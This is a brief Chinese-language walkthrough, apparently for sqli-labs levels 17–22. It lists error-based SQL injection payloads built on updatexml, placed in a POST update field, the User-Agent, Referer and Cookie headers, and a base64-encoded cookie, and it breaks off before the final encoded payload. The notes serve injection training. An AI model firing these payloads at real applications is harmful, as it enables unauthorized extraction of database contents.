1.POST update注入(17关)
爆出数据库的版本,1' or updatexml (1,concat(0x7e,version(),0x7e),1) #
2.Header报错 (18关)
在UA末尾添加'报错,存在注入点
注入语句:1',1,updatexml(1,concat(0x7e,database(),0x7e),1)) #
爆出数据库为security
3.Referer(19关)
在Referer末尾加单引号,报错
Referer: 1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1
4.cookie(20关)
在原始界面输入内容返回如下,尝试抓包后在cookie后注入
Cookie: uname=admin' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1
5.BASE64转码(21关,22关更换为双引号)
输入用户名和密码为admin后显示为YWRtaW4=
通过burp suite转码后结果为admin
所以我们将注入的语句通过base64进行编码,复制到cookie参数后面
如下,就可以看到库名了